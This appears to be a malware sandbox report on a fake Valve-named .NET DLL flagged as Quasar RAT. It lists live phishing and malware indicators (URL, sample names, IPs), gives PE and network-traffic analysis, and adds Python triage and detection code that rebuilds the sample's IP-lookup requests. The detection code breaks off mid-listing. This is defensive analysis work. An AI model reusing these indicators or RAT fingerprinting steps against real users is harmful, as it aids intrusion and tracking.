https://trk.klclick3.com/ls/click?upn=u001.I9LhpOxgCcXrD8xJgdEO8WUi5tV6wurQhjXRfDAEMS-2FcMa0g0FTnahsI5IEFHinKC-2FGj8kpAqnaoI6Qoa3vFLySKKSAfv0Wxu2Dy-2BRyMntsvwfzFfHILPHPRV90LmePFgMglDqCtK67PLGfWxTEMO93TwkvZZtNoI477LbXPoBjcrwXEgXl1dr5-2Bsbz8VZiUNXN768BEIA-2BYnNr4FIu9nA-3D-3DATse_RSmWOI3fPdFDxAydigDPQ0uJwuQ-2FUs3Wu1xZT2pFOHtvwUa8-2Ftks3ld44BID-2BJgD3ps4M8U7HlIP10yVJ6ZeFvrA3iSG0rco-2Fzt7OL4FXId6TCwVFcQcW-2F2E-2Faa3q7Weo2xYvFD1h9l7jEVdzkUp4Kp77hFD1XYDRoeiAzaz-2BFA4Srg7EiFD-2BO6F2w7c4O0pEK7boN40RNA-2F8TusPddYFOH48pk30jzUw7CYeSygfO9hZkczhRjxavPfa15ZQShZu24zwPQtiM5rYtaL0zKZeMvKbYsdrel3rTSJBLKXR2MMcVfiOQJo1JHVPclcvULrA5xewzIBFupBKpLaDZv1KWbZjd-2F-2BEE4MzV1Vme-2FCaJxOXBca4gsTghUHHiiDIxlLzjYnWoXwKNHeSslKR-2BUfUjOwwSmF8fN79-2FzJVuaw4lasmT9EvZxZK-2BAH7JlY5rrgFg8Woxh0SAeruKYO5LevAgBmW3c5sr-2F85S8FCROz5cY3UDqnpYtBxr1o9XTEZg-2FV#/kLIB1/evbLziA5E-SUREIDAN1VmLjN2YAtWauRWdi5SYsxWatF2a | malicious | HTMLPhisher | 95.217.66.83
o82ktPixLt.exe | malicious | RedLine | 95.217.245.123
gQzJjvCHZV.exe | malicious | RedLine | 95.217.245.123
DCAbo3D46k.exe | malicious | RedLine | 95.217.245.123
wkvH2q7DNh.exe | malicious | RedLine | 95.217.245.123
PvJy3zSayP.exe | malicious | Unknown | 78.47.201.39
Match | Associated Sample Name / URL | Detection | Threat Name | Context
54328bd36c14bd82ddaa0c04b25ed9ad | 6OiUEubyA8.msi | malicious | Quasar | 35.201.97.85
54328bd36c14bd82ddaa0c04b25ed9ad | 855d156285ccf04888dae255256e42682756098471514f6155c7a5ef8556a95f.zip | malicious | Snake Keylogger | 35.201.97.85
54328bd36c14bd82ddaa0c04b25ed9ad | rDoc_87993766478.exe | malicious | Lokibot | 35.201.97.85
54328bd36c14bd82ddaa0c04b25ed9ad | rTransaction_ReceiptCopy.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 35.201.97.85
54328bd36c14bd82ddaa0c04b25ed9ad | rTNT__consignmentnumber__87993766478.exe | malicious | Lokibot | 35.201.97.85
54328bd36c14bd82ddaa0c04b25ed9ad | NewOrder_LCL240887.exe | malicious | GuLoader, Snake Keylogger | 35.201.97.85
54328bd36c14bd82ddaa0c04b25ed9ad | FVG2-20240704.exe | malicious | Snake Keylogger, VIP Keylogger | 35.201.97.85
54328bd36c14bd82ddaa0c04b25ed9ad | SecuriteInfo.com.Win64.PWSX-gen.3492.24691.exe | malicious | Snake Keylogger, VIP Keylogger | 35.201.97.85
54328bd36c14bd82ddaa0c04b25ed9ad | #U8acb#U6c42#U66f8.exe | malicious | PureLog Stealer, Snake Keylogger | 35.201.97.85
54328bd36c14bd82ddaa0c04b25ed9ad | DHL Waybill & Shipping Document.exe | malicious | Snake Keylogger | 35.201.97.85
                                Process:C:\Windows\System32\rundll32.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):42
                                Entropy (8bit):4.0050635535766075
                                Encrypted:false
                                SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                Malicious:false
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                                Process:C:\Windows\System32\rundll32.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):10
                                Entropy (8bit):2.7219280948873625
                                Encrypted:false
                                SSDEEP:3:Jw/zn:Szn
                                MD5:A727C23FB0D2ED884F90288656DE1378
                                SHA1:7BDF93C8575CA64B179D7316531BFF47F2D06768
                                SHA-256:58F2795D1156D90EC8057C218D5E53E54A21FE92AF2414D516C5A77B363FDA6B
                                SHA-512:B2732256B5675E00960DF616CB78D723D886CB0E11C181EB7650CDE30BAE251732EE56F93132A1282DBBD2EF3662674540AFAC08EC98BEB8FBBAF3A5DDD56A28
                                Malicious:false
                                Preview:15:07:2024
                                File type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):4.1366584226365735
                                TrID:
                                • Win64 Dynamic Link Library (generic) Net Framework (111504/3) 44.42%
                                • Win64 Dynamic Link Library (generic) (102004/3) 40.63%
                                • Win64 Executable (generic) Net Framework (21505/4) 8.57%
                                • Win64 Executable (generic) (12005/4) 4.78%
                                • Generic Win/DOS Executable (2004/3) 0.80%
                                File name:vstdlib_s64.dll.dll
                                File size:7'477'096 bytes
                                MD5:ac7da10e20d625cc463536172d0ac33e
                                SHA1:c4242194e3faa82506513e2572c160a30082bfb0
                                SHA256:6799f1948048b91991392b421ccc6b30be415cda26deb71baeecb33b41b12959
                                SHA512:77f929fa05266793765014b24fede5f0c64f88598f9580a6aaa4d339b428e4a68eacdb4dc0cab1f1c428f870c57ac54e55423f8fbbe80fd1a48ac54442f1787a
                                SSDEEP:24576:KxClp92/e9DlZ62nbFSu28jugkg91tVWwS+pvbOOmwWYhssXfKySQN1jk1eI8ykJ:h0bz0nbb
                                TLSH:8976324CE43A95D8CD4672F0AC96198C39855DD89FBD572A042CC0B827EB6BC42877FE
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....f.f.........." ......q.........f.q.. ........... .......................`r...........@...@......@............... .....
                                Icon Hash:7ae282899bbab082
                                Entrypoint:0x18071fd66
                                Entrypoint Section:.text
                                Digitally signed:true
                                Imagebase:0x180000000
                                Subsystem:windows cui
                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Time Stamp:0x6685668E [Wed Jul 3 14:56:14 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:dae02f32a21e03ce65412f6e56942daa
Signature Valid:false
Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:The digital signature of the object did not verify
Error Number:-2146869232 (0x80096010, TRUST_E_BAD_DIGEST: the digest inside the signature does not match the file's actual contents, so although the certificate chain identifies Valve Corp., the signature does not cover these bytes and "Digitally signed: true" above means only that a certificate blob is attached)
                                Not Before, Not After
                                • 07/10/2021 01:00:00 10/10/2024 00:59:59
                                Subject Chain
                                • CN=Valve Corp., O=Valve Corp., L=Bellevue, S=Washington, C=US
                                Version:3
                                Thumbprint MD5:83896ECC20DB9E84A1A1D6D5B5B15A5D
                                Thumbprint SHA-1:935767D66FAD4AD2D1F03A095C49370DC74DF607
                                Thumbprint SHA-256:E98CCA8343960798A47BDB3CDD319DB4B9C6DBD8BC7574C13F6C09A925AEC0E9
                                Serial:0689B3BCEB4409890A32D71976B132A4
Instruction (entry point 0x18071fd66, listed by the report as a 32-bit decode)
dec eax
mov eax, dword ptr [80002000h]
add dword ptr [eax], eax
add byte ptr [eax], al
jmp eax
add byte ptr [eax], al   (repeated 94 times: zero padding after the stub)
The listing above is the 64-bit entry stub decoded as 32-bit code, so it is misleading as printed. The same bytes, 48 A1 00 20 00 80 01 00 00 00 FF E0, read in 64-bit mode as mov rax, qword ptr [0x180002000] (48 is the REX.W prefix, not dec eax, and the two "add" lines are the upper half of the 8-byte address) followed by jmp rax. 0x180002000 is the image base plus the IAT at RVA 0x2000, whose single entry is mscoree.dll!_CorDllMain (see the imports below): this is the standard managed-DLL entry thunk, and everything the sample does lives in the CLR metadata and IL inside .text, not in native code at the entry point.
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x720068 | 0x28 | .sdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x71fd10 | 0x53 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x722000 | 0x33c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x71ea00 | 0x2d68 | (file offset, not an RVA)
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x724000 | 0x30 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x10 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2010 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
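Two of these directory entries carry the triage verdict. A non-empty IMAGE_DIRECTORY_ENTRY_SECURITY means a WIN_CERTIFICATE blob is attached, which is all that "Digitally signed: true" reports; the entry is a file offset rather than an RVA, and 0x71ea00 + 0x2d68 = 0x721768 = 7,477,096, exactly the file size, so the certificate table is the last 11,624 bytes of the file. A non-empty IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR means a CLR header is present: this is a managed assembly, whatever the Valve-style file name and V_* exports suggest. The dependency-free triage below is an added example written for this page, not Joe Sandbox's or the sample's code. build_header_like_sample() fabricates a bare PE32+ DLL header carrying the values from this report (no sections and no certificate bytes behind it), and the real-file path is taken when a filename is passed on the command line.

```python
import struct
import sys

IMAGE_FILE_MACHINE_AMD64 = 0x8664
IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
IMAGE_FILE_LARGE_ADDRESS_AWARE = 0x0020
IMAGE_FILE_DLL = 0x2000
PE32PLUS_MAGIC = 0x20B
IMAGE_SUBSYSTEM_WINDOWS_CUI = 3

# Data-directory slots in winnt.h order.
DIR_SECURITY = 4          # WIN_CERTIFICATE table; "VirtualAddress" here is a FILE OFFSET
DIR_COM_DESCRIPTOR = 14   # IMAGE_COR20_HEADER; non-empty means a managed (.NET) image


def pe_triage(data: bytes) -> dict:
    """First-look facts from a PE32+ image: DLL or not, .NET or not,
    certificate blob attached or not, and where execution starts."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    (machine, n_sections, timestamp, _symtab, _nsyms,
     _opt_size, characteristics) = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != PE32PLUS_MAGIC:
        raise ValueError("only PE32+ is handled in this example")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]
    n_dirs = struct.unpack_from("<I", data, opt + 108)[0]
    dirs = [struct.unpack_from("<II", data, opt + 112 + 8 * i) for i in range(n_dirs)]
    sec_off, sec_size = dirs[DIR_SECURITY] if n_dirs > DIR_SECURITY else (0, 0)
    _clr_rva, clr_size = dirs[DIR_COM_DESCRIPTOR] if n_dirs > DIR_COM_DESCRIPTOR else (0, 0)
    return {
        "machine": machine,
        "sections": n_sections,
        "timestamp": timestamp,
        "is_dll": bool(characteristics & IMAGE_FILE_DLL),
        "subsystem": subsystem,
        "entry_va": image_base + entry_rva,
        "is_dotnet": clr_size != 0,
        # A certificate table being present is NOT validity. The digest inside the
        # PKCS#7 blob must be recomputed over the file and compared, and the chain
        # validated, before "signed" means anything: a blob can be copied from any
        # signed file onto any other file, and the header will look exactly like this.
        "has_authenticode_blob": sec_size != 0,
        "authenticode_blob_end": sec_off + sec_size,   # file offset; normally equals file size
    }


def build_header_like_sample(signed: bool = True) -> bytes:
    """Constructed test input: a bare PE32+ DLL header with the values listed in this
    report (not the sample's bytes). No sections and no certificate follow it."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                                   # e_lfanew
    coff = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_AMD64, 4, 0x6685668E, 0, 0, 240,
                       IMAGE_FILE_EXECUTABLE_IMAGE | IMAGE_FILE_LARGE_ADDRESS_AWARE | IMAGE_FILE_DLL)
    opt = bytearray(240)                                                    # PE32+ optional header, 16 dirs
    struct.pack_into("<H", opt, 0, PE32PLUS_MAGIC)
    struct.pack_into("<I", opt, 16, 0x71FD66)                               # AddressOfEntryPoint
    struct.pack_into("<Q", opt, 24, 0x180000000)                            # ImageBase
    struct.pack_into("<H", opt, 68, IMAGE_SUBSYSTEM_WINDOWS_CUI)
    struct.pack_into("<I", opt, 108, 16)                                    # NumberOfRvaAndSizes
    if signed:
        struct.pack_into("<II", opt, 112 + 8 * DIR_SECURITY, 0x71EA00, 0x2D68)
    struct.pack_into("<II", opt, 112 + 8 * DIR_COM_DESCRIPTOR, 0x2010, 0x48)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_header_like_sample()
    for key, value in pe_triage(blob).items():
        print(f"{key:>22}: {value:#x}" if type(value) is int else f"{key:>22}: {value}")
```

Run it against the real file and authenticode_blob_end should print 7477096; if it is smaller than the file size, bytes were appended after signing, and if has_authenticode_blob is true the next step is an actual verification (signtool verify /pa or Get-AuthenticodeSignature on Windows), never a glance at this flag.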
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x71dd72 | 0x71de00 | 4d64ab768b4471f4dad807114cfa4605 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.sdata | 0x720000 | 0x1e3 | 0x200 | 205f35db0c4d7d485e9c66117be0b622 | False | 0.587890625 | OpenPGP Public Key | 4.531194460208676 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x722000 | 0x33c | 0x400 | 9e217ba6f8b9f646b6164e424d8a3a34 | False | 0.341796875 | data | 2.6099876523576393 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x724000 | 0x30 | 0x200 | 4d5f1334246aa8d607d9db9127b03f3b | False | 0.115234375 | data | 0.5919266160963527 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x722058 | 0x2e4 | data | | | 0.4297297297297297
DLL | Import
mscoree.dll | _CorDllMain
Name | Ordinal | Address
V_FixDoubleSlashes | 0 | 0x180002122
V_FixSlashes | 1 | 0x1800020d2
V_IsAbsolutePath | 2 | 0x180002112
V_RemoveDotSlashes | 3 | 0x180002102
V_StripLastDir | 4 | 0x1800020c2
V_StripTrailingSlash | 5 | 0x1800020b2
V_UTF16ToUTF8 | 6 | 0x1800020a2
V_UTF8ToUTF16 | 7 | 0x180002092
V_snprintf | 8 | 0x180002062
V_strncat | 9 | 0x180002082
V_strncat_length | 10 | 0x1800020f2
V_strncpy | 11 | 0x1800020e2
V_vsnwprintf | 12 | 0x180002072
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
07/15/24-21:07:19.513418 | TCP | 2814031 | ETPRO TROJAN W32/Quasar RAT Connectivity Check | 49738 | 80 | 192.168.2.4 | 88.198.193.213
07/15/24-21:07:19.945864 | TCP | 2814030 | ETPRO TROJAN W32/Quasar RAT Connectivity Check 2 | 49739 | 80 | 192.168.2.4 | 3.33.130.190
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 15, 2024 21:07:19.239309072 CEST | 49735 | 443 | 192.168.2.4 | 35.201.97.85
Jul 15, 2024 21:07:19.239355087 CEST | 443 | 49735 | 35.201.97.85 | 192.168.2.4
Jul 15, 2024 21:07:19.239518881 CEST | 49735 | 443 | 192.168.2.4 | 35.201.97.85
Jul 15, 2024 21:07:19.271861076 CEST | 49735 | 443 | 192.168.2.4 | 35.201.97.85
Jul 15, 2024 21:07:19.271893024 CEST | 443 | 49735 | 35.201.97.85 | 192.168.2.4
Jul 15, 2024 21:07:19.507909060 CEST | 49738 | 80 | 192.168.2.4 | 88.198.193.213
Jul 15, 2024 21:07:19.512898922 CEST | 80 | 49738 | 88.198.193.213 | 192.168.2.4
Jul 15, 2024 21:07:19.513000965 CEST | 49738 | 80 | 192.168.2.4 | 88.198.193.213
Jul 15, 2024 21:07:19.513417959 CEST | 49738 | 80 | 192.168.2.4 | 88.198.193.213
Jul 15, 2024 21:07:19.518230915 CEST | 80 | 49738 | 88.198.193.213 | 192.168.2.4
Jul 15, 2024 21:07:19.786905050 CEST | 443 | 49735 | 35.201.97.85 | 192.168.2.4
Jul 15, 2024 21:07:19.787228107 CEST | 49735 | 443 | 192.168.2.4 | 35.201.97.85
Jul 15, 2024 21:07:19.792002916 CEST | 49735 | 443 | 192.168.2.4 | 35.201.97.85
Jul 15, 2024 21:07:19.792021990 CEST | 443 | 49735 | 35.201.97.85 | 192.168.2.4
Jul 15, 2024 21:07:19.792522907 CEST | 443 | 49735 | 35.201.97.85 | 192.168.2.4
Jul 15, 2024 21:07:19.838023901 CEST | 49735 | 443 | 192.168.2.4 | 35.201.97.85
Jul 15, 2024 21:07:19.854521990 CEST | 49738 | 80 | 192.168.2.4 | 88.198.193.213
Jul 15, 2024 21:07:19.884505033 CEST | 443 | 49735 | 35.201.97.85 | 192.168.2.4
Jul 15, 2024 21:07:19.900291920 CEST | 80 | 49738 | 88.198.193.213 | 192.168.2.4
Jul 15, 2024 21:07:19.940666914 CEST | 49739 | 80 | 192.168.2.4 | 3.33.130.190
Jul 15, 2024 21:07:19.945677996 CEST | 80 | 49739 | 3.33.130.190 | 192.168.2.4
Jul 15, 2024 21:07:19.945863962 CEST | 49739 | 80 | 192.168.2.4 | 3.33.130.190
Jul 15, 2024 21:07:19.945863962 CEST | 49739 | 80 | 192.168.2.4 | 3.33.130.190
Jul 15, 2024 21:07:19.950813055 CEST | 80 | 49739 | 3.33.130.190 | 192.168.2.4
Jul 15, 2024 21:07:19.991322994 CEST | 80 | 49738 | 88.198.193.213 | 192.168.2.4
Jul 15, 2024 21:07:19.992115974 CEST | 49738 | 80 | 192.168.2.4 | 88.198.193.213
Jul 15, 2024 21:07:20.020019054 CEST | 443 | 49735 | 35.201.97.85 | 192.168.2.4
Jul 15, 2024 21:07:20.054713011 CEST | 49735 | 443 | 192.168.2.4 | 35.201.97.85
Jul 15, 2024 21:07:20.054778099 CEST | 443 | 49735 | 35.201.97.85 | 192.168.2.4
Jul 15, 2024 21:07:20.188385010 CEST | 443 | 49735 | 35.201.97.85 | 192.168.2.4
Jul 15, 2024 21:07:20.188676119 CEST | 443 | 49735 | 35.201.97.85 | 192.168.2.4
Jul 15, 2024 21:07:20.188889980 CEST | 49735 | 443 | 192.168.2.4 | 35.201.97.85
Jul 15, 2024 21:07:20.194135904 CEST | 49739 | 80 | 192.168.2.4 | 3.33.130.190
Jul 15, 2024 21:07:20.196966887 CEST | 49735 | 443 | 192.168.2.4 | 35.201.97.85
Jul 15, 2024 21:07:20.233011961 CEST | 49740 | 80 | 192.168.2.4 | 104.26.13.205
Jul 15, 2024 21:07:20.238089085 CEST | 80 | 49740 | 104.26.13.205 | 192.168.2.4
Jul 15, 2024 21:07:20.238164902 CEST | 49740 | 80 | 192.168.2.4 | 104.26.13.205
Jul 15, 2024 21:07:20.238285065 CEST | 49740 | 80 | 192.168.2.4 | 104.26.13.205
Jul 15, 2024 21:07:20.240206957 CEST | 80 | 49739 | 3.33.130.190 | 192.168.2.4
Jul 15, 2024 21:07:20.243071079 CEST | 80 | 49740 | 104.26.13.205 | 192.168.2.4
Jul 15, 2024 21:07:20.344536066 CEST | 80 | 49739 | 3.33.130.190 | 192.168.2.4
Jul 15, 2024 21:07:20.344614983 CEST | 49739 | 80 | 192.168.2.4 | 3.33.130.190
Jul 15, 2024 21:07:20.737621069 CEST | 80 | 49740 | 104.26.13.205 | 192.168.2.4
Jul 15, 2024 21:07:20.783165932 CEST | 49740 | 80 | 192.168.2.4 | 104.26.13.205
Jul 15, 2024 21:09:00.753093004 CEST | 49740 | 80 | 192.168.2.4 | 104.26.13.205
Jul 15, 2024 21:09:01.056432962 CEST | 49740 | 80 | 192.168.2.4 | 104.26.13.205
Jul 15, 2024 21:09:01.284600973 CEST | 80 | 49740 | 104.26.13.205 | 192.168.2.4
Jul 15, 2024 21:09:01.284889936 CEST | 80 | 49740 | 104.26.13.205 | 192.168.2.4
Jul 15, 2024 21:09:01.285069942 CEST | 49740 | 80 | 192.168.2.4 | 104.26.13.205
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 15, 2024 21:07:19.098495007 CEST | 55337 | 53 | 192.168.2.4 | 1.1.1.1
Jul 15, 2024 21:07:19.186568022 CEST | 53 | 55337 | 1.1.1.1 | 192.168.2.4
Jul 15, 2024 21:07:19.494256020 CEST | 53139 | 53 | 192.168.2.4 | 1.1.1.1
Jul 15, 2024 21:07:19.507066011 CEST | 53 | 53139 | 1.1.1.1 | 192.168.2.4
Jul 15, 2024 21:07:19.923499107 CEST | 51014 | 53 | 192.168.2.4 | 1.1.1.1
Jul 15, 2024 21:07:19.940026045 CEST | 53 | 51014 | 1.1.1.1 | 192.168.2.4
Jul 15, 2024 21:07:20.218703985 CEST | 49717 | 53 | 192.168.2.4 | 1.1.1.1
Jul 15, 2024 21:07:20.225878954 CEST | 53 | 49717 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 15, 2024 21:07:19.098495007 CEST | 192.168.2.4 | 1.1.1.1 | 0x7911 | Standard query (0) | argentina-e4162-default-rtdb.firebaseio.com | A (IP address) | IN (0x0001) | false
Jul 15, 2024 21:07:19.494256020 CEST | 192.168.2.4 | 1.1.1.1 | 0xfff6 | Standard query (0) | telize.com | A (IP address) | IN (0x0001) | false
Jul 15, 2024 21:07:19.923499107 CEST | 192.168.2.4 | 1.1.1.1 | 0xd83f | Standard query (0) | freegeoip.net | A (IP address) | IN (0x0001) | false
Jul 15, 2024 21:07:20.218703985 CEST | 192.168.2.4 | 1.1.1.1 | 0x1adc | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 15, 2024 21:07:19.186568022 CEST | 1.1.1.1 | 192.168.2.4 | 0x7911 | No error (0) | argentina-e4162-default-rtdb.firebaseio.com | | 35.201.97.85 | A (IP address) | IN (0x0001) | false
Jul 15, 2024 21:07:19.186568022 CEST | 1.1.1.1 | 192.168.2.4 | 0x7911 | No error (0) | argentina-e4162-default-rtdb.firebaseio.com | | 35.190.39.113 | A (IP address) | IN (0x0001) | false
Jul 15, 2024 21:07:19.186568022 CEST | 1.1.1.1 | 192.168.2.4 | 0x7911 | No error (0) | argentina-e4162-default-rtdb.firebaseio.com | | 34.120.206.254 | A (IP address) | IN (0x0001) | false
Jul 15, 2024 21:07:19.186568022 CEST | 1.1.1.1 | 192.168.2.4 | 0x7911 | No error (0) | argentina-e4162-default-rtdb.firebaseio.com | | 34.120.160.131 | A (IP address) | IN (0x0001) | false
Jul 15, 2024 21:07:19.507066011 CEST | 1.1.1.1 | 192.168.2.4 | 0xfff6 | No error (0) | telize.com | | 88.198.193.213 | A (IP address) | IN (0x0001) | false
Jul 15, 2024 21:07:19.940026045 CEST | 1.1.1.1 | 192.168.2.4 | 0xd83f | No error (0) | freegeoip.net | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Jul 15, 2024 21:07:19.940026045 CEST | 1.1.1.1 | 192.168.2.4 | 0xd83f | No error (0) | freegeoip.net | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Jul 15, 2024 21:07:20.225878954 CEST | 1.1.1.1 | 192.168.2.4 | 0x1adc | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Jul 15, 2024 21:07:20.225878954 CEST | 1.1.1.1 | 192.168.2.4 | 0x1adc | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Jul 15, 2024 21:07:20.225878954 CEST | 1.1.1.1 | 192.168.2.4 | 0x1adc | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
                                • argentina-e4162-default-rtdb.firebaseio.com
                                • telize.com
                                • freegeoip.net
                                • api.ipify.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49738 | 88.198.193.213 | 80 | 7100 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Jul 15, 2024 21:07:19.513417959 CEST | 144 | OUT | GET /geoip HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
                                Host: telize.com
                                Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49739 | 3.33.130.190 | 80 | 7100 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Jul 15, 2024 21:07:19.945863962 CEST | 146 | OUT | GET /xml/ HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
                                Host: freegeoip.net
                                Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49740 | 104.26.13.205 | 80 | 7100 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Jul 15, 2024 21:07:20.238285065 CEST | 142 | OUT | GET / HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
                                Host: api.ipify.org
                                Connection: Keep-Alive
Jul 15, 2024 21:07:20.737621069 CEST | 227 | IN | HTTP/1.1 200 OK
                                Date: Mon, 15 Jul 2024 19:07:20 GMT
                                Content-Type: text/plain
                                Content-Length: 11
                                Connection: keep-alive
                                Vary: Origin
                                CF-Cache-Status: DYNAMIC
                                Server: cloudflare
                                CF-RAY: 8a3c08ee29850f53-EWR
                                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                Data Ascii: 8.46.123.33
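The three plaintext sessions above are what the ETPRO "Quasar RAT Connectivity Check" alerts fire on: back-to-back public-IP and geolocation lookups (telize.com /geoip, freegeoip.net /xml/, api.ipify.org /) issued by rundll32.exe, all with one fixed User-Agent that claims Firefox 36 on Windows NT 6.3 (Windows 8.1), a browser from 2015 running on an OS this analysis VM is not. None of those signals is damning alone; together they are. The detector below is an added example for this page, not Joe Sandbox or Emerging Threats code. It rebuilds the three requests byte-for-byte from the sessions above (the 144/146/142-byte lengths match the report), adds one hypothetical benign control request, and assumes two things not in the report: a host_nt field giving the kernel version the request came from, and a short list of DLL-hosting Windows binaries that have no HTTP client of their own.

```python
import re

# Exact User-Agent observed in all three sessions of this report.
UA_SEEN = "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0"

# The three lookup services contacted in this report.
IP_LOOKUP_HOSTS = {"telize.com", "freegeoip.net", "api.ipify.org"}

# Assumption for the rule: binaries that exist to host someone else's DLL and
# never speak HTTP by themselves.
HOSTING_BINARIES = {"rundll32.exe", "regsvr32.exe", "regasm.exe", "installutil.exe"}

NT_VERSION = re.compile(r"Windows NT (\d+\.\d+)")


def raw_request(target: str, host: str, ua: str) -> str:
    """Request bytes in the exact header order the sandbox captured."""
    return (f"GET {target} HTTP/1.1\r\nUser-Agent: {ua}\r\nHost: {host}\r\n"
            "Connection: Keep-Alive\r\n\r\n")


# Constructed input: sessions 0-2 are the report's requests; session 3 is a
# hypothetical benign control (a current browser asking ipify for its address).
SESSIONS = [
    {"id": 0, "process": r"C:\Windows\System32\rundll32.exe", "host_nt": "10.0",
     "raw": raw_request("/geoip", "telize.com", UA_SEEN)},
    {"id": 1, "process": r"C:\Windows\System32\rundll32.exe", "host_nt": "10.0",
     "raw": raw_request("/xml/", "freegeoip.net", UA_SEEN)},
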